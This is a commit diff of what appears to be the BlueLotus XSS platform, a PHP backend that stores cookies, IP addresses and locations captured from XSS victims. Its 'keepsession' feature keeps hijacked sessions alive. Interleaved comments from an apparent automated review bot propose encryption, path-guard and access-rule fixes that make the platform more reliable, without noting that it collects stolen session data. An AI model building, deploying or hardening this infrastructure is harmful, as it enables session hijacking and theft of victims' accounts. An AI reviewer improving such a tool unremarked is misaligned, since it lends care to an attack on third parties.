$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
$info=@file_get_contents($logFile);
if($info!==false && strncmp($info,'<?php exit();?>',15)===0)
{
$info=substr($info,15);
$info=decrypt($info,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type);
}
else
$info="";
$info=encrypt($info, $new_enable_encrypt, $new_encrypt_pass, $new_encrypt_type);
if(@file_put_contents($logFile, '<?php exit();?>'.$info))
echo "修改一条xss记录成功\n";
else
echo "修改一条xss记录失败可能是没有权限chmod 777\n";
}
}
}
function modify_js_desc($path,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type)
{
$files = glob($path . '/*.js');
foreach ($files as $file){
//由于可能有中文名,故使用正则来提取文件名
$filename=preg_replace('/^.+[\\\\\\/]/', '', $file);
$filename=substr ( $filename , 0 , strlen ($filename)-3 );
$desc=@file_get_contents(dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc');
if($desc!==false)
$desc=decrypt($desc,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type);
else
$desc="";
$desc=encrypt($desc, $new_enable_encrypt, $new_encrypt_pass, $new_encrypt_type);
if(@file_put_contents(dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc', $desc))
echo "修改一条js描述成功\n";
else
echo "修改一条js描述失败可能是没有权限chmod 777\n";
}
}
function encrypt($info,$enable_encrypt,$encrypt_pass,$encrypt_type)
{
if($enable_encrypt) {
if($encrypt_type==="AES") {
require_once("aes.php");
$info=AESEncryptCtr($info,$encrypt_pass);
}
else {
require_once("rc4.php");
$info=base64_encode( rc4($info,$encrypt_pass) );
}
}
else
$info=base64_encode($info);
return $info;
}
function decrypt($info,$enable_encrypt,$encrypt_pass,$encrypt_type)
{
if($enable_encrypt) {
if($encrypt_type==="AES") {
require_once("aes.php");
$info=AESDecryptCtr($info,$encrypt_pass);
}
else {
require_once("rc4.php");
$info=rc4(base64_decode($info),$encrypt_pass);
}
}
else
$info=base64_decode($info);
return $info;
}
?>
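Review bot: The enable/disable arguments arrive from `$argv` as strings, and `if($enable_encrypt)` in `encrypt()`/`decrypt()` treats the string `"false"` as true, so the documented call `... true bluelotus AES false xxxx AES` still encrypts with the throw-away password instead of storing plain base64. Convert once at the entry point, e.g. `$old_enable_encrypt = ($argv[1]==='true');`, and do the same for the new flag and for the `update` path, which passes `$argv[2]` and the literal `"true"` the same way. `modify_xss_record()` and `modify_js_desc()` also replace unreadable or header-less input with `""` and write that back, which erases the record; skipping the file with a message would be safer. Since the header comment says the script is unauthenticated, an `if(PHP_SAPI!=='cli') exit();` guard below the manual `exit()` would keep it off the web even after someone enables it.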


@@ -2,16 +2,22 @@
if(!defined('IN_XSS_PLATFORM')) {
exit('Access Denied');
}
//默认密码bluelotus
//后台登录密码:默认密码bluelotus
define('PASS', '2a05218c7aa0a6dbd370985d984627b8');
//记录封禁ip列表存放位置
//xss记录封禁ip列表存放目录
define('DATA_PATH', 'data');
//开启对记录封禁ip列表的AES加密
//js模板存放目录
define('JS_TEMPLATE_PATH', 'template');
//我的js存放目录
define('MY_JS_PATH', 'myjs');
//是否加密“xss记录封禁ip列表js描述”
define('ENABLE_ENCRYPT', true);
//加密密码
define('ENCRYPT_PASS', "bluelotus");
//加密方法AES或RC4
define('ENCRYPT_TYPE', "RC4");
//是否启用KEEP_SESSION功能需要外部定时访问keepsession.php
define('KEEP_SESSION', true);
//ip数据库地址
//ip归属地数据库地址
define('IPDATA_PATH', "qqwry.dat");
?>
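Review bot: The shipped defaults make the encryption key (`ENCRYPT_PASS`, "bluelotus") identical to the documented default login password, and `PASS` is a bare 32-hex digest, which is consistent with an unsalted MD5-style hash (how it is computed is not visible here). Anyone who installs without editing this file gets stored records protected by a publicly known key, so the comment above each constant should say it must be changed before deployment, e.g. `//MUST be changed before deployment; do not reuse the login password`. The new default `ENCRYPT_TYPE` of RC4 is a cipher that has been prohibited in TLS (RFC 7465). The call `rc4($info,$encrypt_pass)` in change_encrypt_pass.php takes only the data and the password, which suggests every record shares one keystream (rc4.php itself is not shown), so AES would be the safer default.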

1
diff/index.html Normal file

@@ -0,0 +1 @@
Boom has been planted!

168
dio.php

@@ -6,60 +6,80 @@ require_once("config.php");
require_once("functions.php");
//对记录的读写操作无数据库采用读写文件的方式文件名即请求时的时间戳同时也是记录的id
function saveInfo($info,$filename)
function save_xss_record($info,$filename)
{
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
!file_exists($logFile) && @touch($logFile);
if(ENABLE_ENCRYPT)
$info=encrypt($info,ENCRYPT_PASS);
else
$info=base64_encode($info);
$info=encrypt($info);
@file_put_contents($logFile, '<?php exit();?>'.$info);
if(file_put_contents($logFile, '<?php exit();?>'.$info)===false)
return false;
else
return true;
}
function loadInfo($filename)
function load_xss_record($filename)
{
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
if(!file_exists($logFile))
return false;
$info=@file_get_contents($logFile);
if(strncmp($info,'<?php exit();?>',15)!=0)
return false;
$info=substr($info,15);
if(ENABLE_ENCRYPT)
$info=decrypt($info,ENCRYPT_PASS);
else
$info=base64_decode($info);
if(!preg_match('/^[A-Za-z0-9\x00-\x80~!@#$%&_+-=:";\'<>,\/"\[\]\\\^\.\|\?\*\+\(\)\{\}\s]+$/',$info))
return false;
$info=json_decode($info, true);
$isChange=false;
if(!isset($info['location']))
if(strpos($filename, "..")===false && strpos($filename, "/")===false && strpos($filename, "\\")===false)
{
$info['location']=convertip($info['user_IP'],IPDATA_PATH);
$isChange=true;
}
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
if(!file_exists($logFile))
return false;
$info=@file_get_contents($logFile);
if($info===false)
return false;
if($isChange)
saveInfo(json_encode($info),$filename);
return $info;
if(strncmp($info,'<?php exit();?>',15)!=0)
return false;
$info=substr($info,15);
$info=decrypt($info);
//只会出现在加密密码错误的时候
if(!preg_match('/^[A-Za-z0-9\x00-\x80~!@#$%&_+-=:";\'<>,\/"\[\]\\\^\.\|\?\*\+\(\)\{\}\s]+$/',$info))
return false;
$info=json_decode($info, true);
//只会出现在加密密码错误的时候
if($info===false)
return false;
$isChange=false;
if(!isset($info['location']))
{
$info['location']=stripStr(convertip($info['user_IP'],IPDATA_PATH));
$isChange=true;
}
//只会出现在加密密码错误的时候
if(!isset($info['request_time']))
{
return false;
}
if($isChange)
save_xss_record(json_encode($info),$filename);
return $info;
}
else
return false;
}
function delInfo($filename)
function delete_xss_record($filename)
{
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
return unlink($logFile);
if(strpos($filename, "..")===false && strpos($filename, "/")===false && strpos($filename, "\\")===false)
{
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
return unlink($logFile);
}
else
return false;
}
function clearInfo()
function clear_xss_record()
{
$files = glob(DATA_PATH . '/*.php');
@@ -68,4 +88,74 @@ function clearInfo()
}
return true;
}
function load_js_content($path,$filename)
{
if(strpos($filename, "..")===false && strpos($filename, "/")===false && strpos($filename, "\\")===false)
{
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.js';
if(!file_exists($file))
return false;
$info=@file_get_contents($file);
if($info===false)
$info="";
return $info;
}
else
return false;
}
function delete_js($path,$filename)
{
if(strpos($filename, "..")===false && strpos($filename, "/")===false && strpos($filename, "\\")===false)
{
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc';
unlink($file);
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.js';
return unlink($file);
}
else
return false;
}
function clear_js($path)
{
$files = glob($path . '/*.desc');
foreach ($files as $file) {
unlink($file);
}
$files = glob($path . '/*.js');
foreach ($files as $file) {
unlink($file);
}
return true;
}
function save_js_content($path,$content,$filename)
{
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.js';
!file_exists($file) && @touch($file);
if(file_put_contents($file, $content)===false)
return false;
else
return true;
}
function save_js_desc($path,$desc,$filename)
{
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc';
!file_exists($file) && @touch($file);
$desc=encrypt($desc);
if(file_put_contents($file, $desc)===false)
return false;
else
return true;
}
?>
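Review bot: `save_xss_record`, `save_js_content` and `save_js_desc` build their target path from `$filename` without the `..`, `/` and `\` check that the same change adds to `load_xss_record`, `delete_xss_record`, `load_js_content` and `delete_js`, so the write paths are the only ones left unguarded. Whether the callers sanitise the name first is not visible here; the guard belongs next to the `file_put_contents` call either way, for example `if(strpos($filename, "..")!==false || strpos($filename, "/")!==false || strpos($filename, "\\")!==false) return false;` as the first statement of each save function. Separately, in `load_xss_record` the test `if($info===false)` after `json_decode($info, true)` never fires, because `json_decode` returns `null` on invalid input; `if(!is_array($info)) return false;` would catch the wrong-key case the comment describes.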


@@ -2,7 +2,8 @@
if(!defined('IN_XSS_PLATFORM')) {
exit('Access Denied');
}
require_once("aes.php");
require_once("config.php");
//nginx无getallheaders函数
if (!function_exists('getallheaders')) {
@@ -97,14 +98,40 @@ function isBase64Formatted($str)
return false;
}
function encrypt($info,$encryptPass)
function encrypt($info)
{
return AESEncryptCtr($info,$encryptPass);
if(ENABLE_ENCRYPT) {
if(ENCRYPT_TYPE==="AES") {
require_once("aes.php");
$info=AESEncryptCtr($info,ENCRYPT_PASS);
}
else {
require_once("rc4.php");
$info=base64_encode( rc4($info,ENCRYPT_PASS) );
}
}
else
$info=base64_encode($info);
return $info;
}
function decrypt($info,$encryptPass)
function decrypt($info)
{
return AESDecryptCtr($info,$encryptPass);
if(ENABLE_ENCRYPT) {
if(ENCRYPT_TYPE==="AES") {
require_once("aes.php");
$info=AESDecryptCtr($info,ENCRYPT_PASS);
}
else {
require_once("rc4.php");
$info=rc4(base64_decode($info),ENCRYPT_PASS);
}
}
else
$info=base64_decode($info);
return $info;
}
//基于Discuz X3.1 function_misc.php
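Review bot: The RC4 branch of `encrypt()` calls `rc4($info,ENCRYPT_PASS)` with the same key for every record and no nonce, so every stored file is XORed with an identical keystream and anyone who obtains two files learns the XOR of their plaintexts. No integrity check is visible on either cipher branch. Since this commit makes RC4 the default, I would mix a random per-record nonce into the key and store it in front of the ciphertext, as sketched below; this assumes the openssl extension is available, and the shipped `myjs/copyright.desc` would need regenerating. The `else` also sends any `ENCRYPT_TYPE` other than the exact string `"AES"` to RC4, so a typo in the config silently switches cipher; an explicit `"RC4"` comparison with a hard failure otherwise would be safer.

```php
// encrypt(), RC4 branch
require_once("rc4.php");
$nonce=openssl_random_pseudo_bytes(16);
$key=hash_hmac('sha256',$nonce,ENCRYPT_PASS,true);
$info=base64_encode( $nonce.rc4($info,$key) );
// … unchanged: AES branch and the base64-only fallback …

// decrypt(), RC4 branch
require_once("rc4.php");
$raw=base64_decode($info);
$key=hash_hmac('sha256',substr($raw,0,16),ENCRYPT_PASS,true);
$info=rc4(substr($raw,16),$key);
```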

1
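--- a/guide/index.html
+++ b/guide/index.html
@@ -0,0 +1 @@
+Boom has been planted!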


@@ -5,6 +5,7 @@ define("IN_XSS_PLATFORM",true);
if(count($_GET)==0&&count($_POST)==0&&count($_COOKIE)==0)
exit();
*/
header("Access-Control-Allow-Origin:*");
require_once("functions.php");
require_once("dio.php");
@@ -51,5 +52,5 @@ if($decoded_cookie_data)
//判断是否keepsession判断标准get或者post或者cookie包含keepsession=1
$info['keepsession']=isKeepSession($info)?true:false;
saveInfo(json_encode($info),$request_time);
save_xss_record(json_encode($info),$request_time);
?>
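Review bot: The call `save_xss_record(json_encode($info),$request_time);` at the end of the second hunk discards the true/false result that this commit adds to `save_xss_record` in dio.php, so a failed write (for example an unwritable data directory) still goes unnoticed. I would log it: `if(!save_xss_record(json_encode($info),$request_time)) error_log('save_xss_record failed for '.$request_time);`. The `header("Access-Control-Allow-Origin:*");` line, which appears to be the addition in the first hunk, deserves a comment stating that the wildcard is intentional for this unauthenticated endpoint and must not be copied to the authenticated admin pages. The script body continues outside both hunks.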


@@ -21,7 +21,7 @@ if(KEEP_SESSION)
$files = glob(DATA_PATH . '/*.php');
foreach ($files as $file) {
$filename=basename($file,".php");
$info=loadInfo($filename);
$info=load_xss_record($filename);
if($info['keepsession']===true)
{
$url=getLocation($info);


@@ -21,7 +21,7 @@ if(isset($_SESSION['isLogin']) && $_SESSION['isLogin']===true)
//判断ip是否在封禁列表中
$forbiddenIPList=loadForbiddenIPList();
$ip=$_SERVER['REMOTE_ADDR'];
if(!isset($forbiddenIPList[$ip]) || $forbiddenIPList[$ip]<3)
if(!isset($forbiddenIPList[$ip]) || $forbiddenIPList[$ip]<=5)
{
if(isset($_POST['password']) && $_POST['password']!="")
{
@@ -54,9 +54,13 @@ function loadForbiddenIPList()
{
$logfile = DATA_PATH . '/forbiddenIPList.dat';
!file_exists( $logfile ) && @touch( $logfile );
$str = file_get_contents( $logfile );
if(ENABLE_ENCRYPT)
$str =decrypt($str,ENCRYPT_PASS);
$str = @file_get_contents( $logfile );
if($str===false)
return array();
$str =decrypt($str);
if($str!='')
{
$result=json_decode($str,true);
@@ -74,8 +78,7 @@ function saveForbiddenIPList($forbiddenIPList)
$logfile = DATA_PATH . '/forbiddenIPList.dat';
!file_exists( $logfile ) && @touch( $logfile );
$str=json_encode($forbiddenIPList);
if(ENABLE_ENCRYPT)
$str = encrypt($str,ENCRYPT_PASS);
$str = encrypt($str);
@file_put_contents($logfile, $str);
}
@@ -132,10 +135,12 @@ function generate_password( $length = 32 ) {
<form action="" method="post">
<input type="password" placeholder="password" id="password" name="password" required="required">
<input id="firesunCheck" type="hidden" name="firesunCheck" value=<?php $firesunCheck=generate_password(32); $_SESSION['firesunCheck']=$firesunCheck;echo json_encode($_SESSION['firesunCheck']);?> />
<button type="submit" id="submit">
<button type="submit" id="submit" disabled="disabled">
<i class="fa fa-arrow-right">
</i>
</button>
</form>
<div id="note">
<a href="#">
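Review bot: The login throttle fails open. The added `if($str===false) return array();` in `loadForbiddenIPList` makes an unreadable `forbiddenIPList.dat` look like an empty ban list, and `saveForbiddenIPList` still writes with `@file_put_contents($logfile, $str);`, so a failed write silently drops the failure count. I would log both cases and write under a lock, e.g. `if(file_put_contents($logfile, $str, LOCK_EX)===false) error_log('cannot persist forbiddenIPList');`. The counter also seems to be read, changed and rewritten without a lock spanning all three steps, so concurrent failed logins may lose increments; the increment code is outside these hunks, as are the ends of both functions.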

5
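--- a/myjs/.htaccess
+++ b/myjs/.htaccess
@@ -0,0 +1,5 @@
+<Files ~ "\.js$">
+Order allow,deny
+Allow from all
+</Files>
+deny from all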
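Review bot: These are Apache 2.2 access directives, so on Apache 2.4 without mod_access_compat they are not recognised, which typically turns every request to the directory into a server error, `.js` files included. On servers that ignore `.htaccess` altogether (nginx, which functions.php already caters for, or `AllowOverride None`) the `.desc` files in this directory are served as-is. Unlike the records under the data directory, the `.desc` files have no `<?php exit();?>` prefix to fall back on. I would add the 2.4 equivalents next to the existing rules, as below, and document the matching nginx rule in the Readme.

```apacheconf
<IfModule mod_authz_core.c>
Require all denied
<Files ~ "\.js$">
Require all granted
</Files>
</IfModule>
<IfModule !mod_authz_core.c>
# … unchanged: the five Order/Allow/deny lines of this file …
</IfModule>
```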

1
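--- a/myjs/copyright.desc
+++ b/myjs/copyright.desc
@@ -0,0 +1 @@
+syO5RRHIMbW3QFs5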

1
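--- a/myjs/copyright.js
+++ b/myjs/copyright.js
@@ -0,0 +1 @@
+alert("Powered by 火日攻天@Firesun");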

1
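--- a/myjs/index.html
+++ b/myjs/index.html
@@ -0,0 +1 @@
+Boom has been planted!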

84
rc4.php Normal file

@@ -0,0 +1,84 @@
<?php
/*
* Copyright 2011 Michael Cutler <m@cotdp.com>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* A PHP implementation of RC4 based on the original C code from
* the 1994 usenet post:
*
* http://groups.google.com/groups?selm=sternCvKL4B.Hyy@netcom.com
*
* @param key_str the key as a binary string
* @param data_str the data to decrypt/encrypt as a binary string
* @return the result of the RC4 as a binary string
* @author Michael Cutler <m@cotdp.com>
*/
function rc4($data_str , $key_str) {
// convert input string(s) to array(s)
$key = array();
$data = array();
for ( $i = 0; $i < strlen($key_str); $i++ ) {
$key[] = ord($key_str{$i});
}
for ( $i = 0; $i < strlen($data_str); $i++ ) {
$data[] = ord($data_str{$i});
}
// prepare key
$state = array( 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,
48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,
64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,
80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,
96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,
112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,
128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,
144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,
160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,
176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,
192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,
208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,
224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,
240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255 );
$len = count($key);
$index1 = $index2 = 0;
for( $counter = 0; $counter < 256; $counter++ ){
$index2 = ( $key[$index1] + $state[$counter] + $index2 ) % 256;
$tmp = $state[$counter];
$state[$counter] = $state[$index2];
$state[$index2] = $tmp;
$index1 = ($index1 + 1) % $len;
}
// rc4
$len = count($data);
$x = $y = 0;
for ($counter = 0; $counter < $len; $counter++) {
$x = ($x + 1) % 256;
$y = ($state[$x] + $y) % 256;
$tmp = $state[$x];
$state[$x] = $state[$y];
$state[$y] = $tmp;
$data[$counter] ^= $state[($state[$x] + $state[$y]) % 256];
}
// convert output back to a string
$data_str = "";
for ( $i = 0; $i < $len; $i++ ) {
$data_str .= chr($data[$i]);
}
return $data_str;
}
?>


@@ -1,205 +0,0 @@
html, body, div, span, iframe,
h1, h2, h3, h4, h5, h6, p, a, img, dl, dt, dd, ol, ul, li,
table, tfoot, thead, tr, th, td,
article, aside, canvas, details, footer, header, section {
margin: 0;
padding: 0;
border: 0;
font-size: 100%;
font: inherit;
}
/* HTML5 display-role reset for older browsers */
body {
line-height: 1;
font-size: 12px;
}
ol, ul {
list-style: none;
}
html, body {
height: 100%;
font-family: 'Microsoft YaHei','Open Sans',arial,sans-serif;
}
html,
body,
.container-fluid,
.row,
.column{
height: 100%;
}
/* font */
@font-face {
font-family: 'icomoon';
src:url('../fonts/icomoon.eot?c8m22a');
src:url('../fonts/icomoon.eot?#iefixc8m22a') format('embedded-opentype'),
url('../fonts/icomoon.woff?c8m22a') format('woff'),
url('../fonts/icomoon.ttf?c8m22a') format('truetype'),
url('../fonts/icomoon.svg?c8m22a#icomoon') format('svg');
font-weight: normal;
font-style: normal;
}
[class^="icon-"], [class*=" icon-"] {
font-family: 'icomoon';
speak: none;
font-style: normal;
font-weight: normal;
font-variant: normal;
text-transform: none;
line-height: 1;
/* Better Font Rendering =========== */
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.icon-logout:before {
content: "\e900";
}
.icon-info:before {
content: "\e904";
}
.icon-template:before {
content: "\e901";
}
.icon-my-js:before {
content: "\e903";
}
.icon-panel:before {
content: "\e902";
}
.icon {
margin-right: 0.917em;
}
/* Bootstrap overrides*/
.row,
.container-fluid {
padding: 0;
margin: 0;
}
.column{
padding-left: 0;
padding-right: 0;
}
.windows {
-moz-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
-webkit-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
}
/* Nav section */
#nav-section{
background-color: #35373d;
width: 220px;
float: left;
height: 100%;
}
#nav-section li {
border-bottom: 1px solid #4a4b51;
white-space:nowrap;
font-size: 11px;
line-height: 11px;
}
#nav-section li a {
color: #b8bbc2;
text-transform: uppercase;
text-decoration: none;
margin-left: 2em;
font-size: 14px;
padding: 2em 1.2em;
}
#nav-section li:hover {
background-color: #212329;
}
#nav-section li.active {
background-color: #0d1016;
}
.nav > li > a:hover,
.nav > li > a:focus {
background: none;
}
#dash-logo {
color: #fff;
background-color: #1996e4;
text-align: center;
}
#sidebar-nav{
padding: 0;
}
#rights {
width:100%;
color: #848690;
font-size: 12px;
position: absolute;
bottom: 10px;
text-align: center;
line-height: 120%;
}
/* Toggle button */
#toggle-button {
margin-top: 27px;
border: none;
}
#toggle-button:hover,
#toggle-button:focus {
background-color: transparent;
}
#toggle-button .icon-bar {
background-color: #fff;
}
/* Main section */
.main-section {
float: none;
width: auto;
overflow: hidden;
height: 100%;
background-color: #eee;
}
#dash-logo,
.main-section-header > h2{
font-size: 18px;
text-transform: uppercase;
line-height: 26px;
padding-top: 30px;
padding-bottom: 30px;
}
.main-section-header > h2 {
padding-left: 1.667em;
white-space: nowrap;
}
.main-section-header {
height: auto;
border-bottom: 1px solid #ededee;
-moz-box-shadow: 1px 0 4px #ededee;
-webkit-box-shadow: 1px 0 4px #ededee;
box-shadow: 1px 0 4px #ededee;
background-color: #fff;
}

1
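--- a/static/css/index.html
+++ b/static/css/index.html
@@ -0,0 +1 @@
+Boom has been planted!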


@@ -70,12 +70,12 @@
border-radius: 0px;
}
.jqx-widget-office {
font-family: Calibri;
font-family: 'Microsoft YaHei',Calibri;
}
.jqx-widget-content-office{font-family: Calibri; border-color: #d4d4d4; color: #444444; background-color: #fff;}
.jqx-widget-header-office{font-family: Calibri; color: #444444; border-color:#d4d4d4; background-color:#ffffff;}
.jqx-widget-content-office{font-family: 'Microsoft YaHei',Calibri; border-color: #d4d4d4; color: #444444; background-color: #fff;}
.jqx-widget-header-office{font-family: 'Microsoft YaHei',Calibri; color: #444444; border-color:#d4d4d4; background-color:#ffffff;}
.jqx-fill-state-normal-office{font-family: Calibri; border-color: #d4d4d4; color: #444444; background: #fdfdfd;}
.jqx-fill-state-normal-office{font-family: 'Microsoft YaHei',Calibri; border-color: #d4d4d4; color: #444444; background: #fdfdfd;}
.jqx-grid-cell-sort-alt-office, .jqx-grid-cell-filter-alt-office, .jqx-grid-cell-pinned-office, .jqx-grid-cell-alt-office, .jqx-grid-cell-sort-office{ background:#ededed; color: #000;}
.jqx-button-office {border-color: #d4d4d4;}
.jqx-fill-state-hover-office{border-color:#86bfa0; color: #000; background:#d3f0e0;}
@@ -84,7 +84,7 @@
.jqx-fill-state-pressed-office{border-color:#429366; color: #000; background:#86bfa0;}
.jqx-scrollbar-state-normal-office, .jqx-grid-bottomright-office, .jqx-panel-bottomright-office, .jqx-listbox-bottomright-office{background:#f3f3f3;}
.jqx-widget-office .jqx-grid-column-header-office, .jqx-grid-cell-office, .jqx-widget-office .jqx-grid-cell-office, .jqx-widget-office .jqx-grid-group-cell-office, .jqx-grid-group-cell-office{font-family: Calibri; border-color:#f3f3f3;}
.jqx-widget-office .jqx-grid-column-header-office, .jqx-grid-cell-office, .jqx-widget-office .jqx-grid-cell-office, .jqx-widget-office .jqx-grid-group-cell-office, .jqx-grid-group-cell-office{font-family: 'Microsoft YaHei',Calibri; border-color:#f3f3f3;}
.jqx-tabs-title-bottom-office, .jqx-tabs-title-office{color: #666666;}
.jqx-tabs-title-hover-bottom-office, .jqx-tabs-title-hover-top-office{color: #217346; background: transparent; border-color: transparent;}
.jqx-tabs-title-selected-bottom-office, .jqx-tabs-selection-tracker-bottom-office, .jqx-tabs-title-selected-top-office, .jqx-tabs-selection-tracker-top-office{font-weight: bold; color: #217346; border-color:#d4d4d4; border-bottom:1px solid #fff; background:#fff}
@@ -94,8 +94,8 @@
background-color: transparent;
border-color: #d4d4d4;
}
.jqx-input-button-header-office, .jqx-calendar-title-header-office, .jqx-grid-office .jqx-widget-header-office, .jqx-grid-header-office, .jqx-grid-column-header-office, .jqx-grid-office {font-family: Calibri; border-color: #d4d4d4; color: #444444; background: #fff;}
.jqx-window-header-office{font-family: Calibri; color: #444444; background: #fff;}
.jqx-input-button-header-office, .jqx-calendar-title-header-office, .jqx-grid-office .jqx-widget-header-office, .jqx-grid-header-office, .jqx-grid-column-header-office, .jqx-grid-office {font-family: 'Microsoft YaHei',Calibri; border-color: #d4d4d4; color: #444444; background: #fff;}
.jqx-window-header-office{font-family: 'Microsoft YaHei',Calibri; color: #444444; background: #fff;}
.jqx-grid-column-menubutton-office {
background-image: url('../images/office-icon-down.png');
}


@@ -1,174 +1,174 @@
* {
margin: 0px;
padding: 0px;
margin: 0px;
padding: 0px;
}
body {
background: #222526;
position: relative;
font-family: 'Microsoft YaHei',verdana;
background: #222526;
position: relative;
font-family: 'Microsoft YaHei',verdana;
}
#loginform {
position: relative;
width: 300px;
left: 50%;
margin-left: -150px;
top: 45%;
height: 190px;
margin-top: -190px;
position: relative;
width: 300px;
left: 50%;
margin-left: -150px;
top: 45%;
height: 190px;
margin-top: -190px;
}
input {
display: block;
margin: 21px auto 15px;
border-radius: 5px;
background: #333333;
width: 85%;
padding: 12px 20px 12px 10px;
border: none;
color: #929999;
box-shadow: inset 0px 1px 5px #272727;
font-size: 0.8em;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
display: block;
margin: 21px auto 15px;
border-radius: 5px;
background: #333333;
width: 85%;
padding: 12px 20px 12px 10px;
border: none;
color: #929999;
box-shadow: inset 0px 1px 5px #272727;
font-size: 0.8em;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
input:focus {
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
box-shadow: 0px 0px 5px 1px #161718;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
box-shadow: 0px 0px 5px 1px #161718;
}
button {
background: #ff5f32;
border-radius: 50%;
border: 10px solid #222526;
font-size: 0.9em;
color: #fff;
font-weight: bold;
cursor: pointer;
width: 85px;
height: 85px;
position: absolute;
right: -42px;
top: 54px;
text-align: center;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
background: #ff5f32;
border-radius: 50%;
border: 10px solid #222526;
font-size: 0.9em;
color: #fff;
font-weight: bold;
cursor: pointer;
width: 85px;
height: 85px;
position: absolute;
right: -42px;
top: 54px;
text-align: center;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
button:hover {
background: #222526;
border-color: #ff5f32;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
background: #222526;
border-color: #ff5f32;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
button i {
font-size: 20px;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
font-size: 20px;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
button:hover i {
color: #ff5f32;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
color: #ff5f32;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
*:focus {
outline: none;
outline: none;
}
::-webkit-input-placeholder {
color: #929999;
color: #929999;
}
:-moz-placeholder {
/* Firefox 18- */
color: #929999;
color: #929999;
}
::-moz-placeholder {
/* Firefox 19+ */
color: #929999;
color: #929999;
}
:-ms-input-placeholder {
color: #929999;
color: #929999;
}
h1 {
text-align: center;
color: #fff;
font-size: 16px;
padding: 12px 0px;
text-align: center;
color: #fff;
font-size: 16px;
padding: 12px 0px;
}
#note {
color: #88887a;
font-size: 0.8em;
text-align: left;
padding-left: 5px;
color: #88887a;
font-size: 0.8em;
text-align: left;
padding-left: 5px;
}
a {
color: #88887a;
text-decoration: none;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
color: #88887a;
text-decoration: none;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
a:hover {
color: #fff;
margin-left: 5px;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
color: #fff;
margin-left: 5px;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
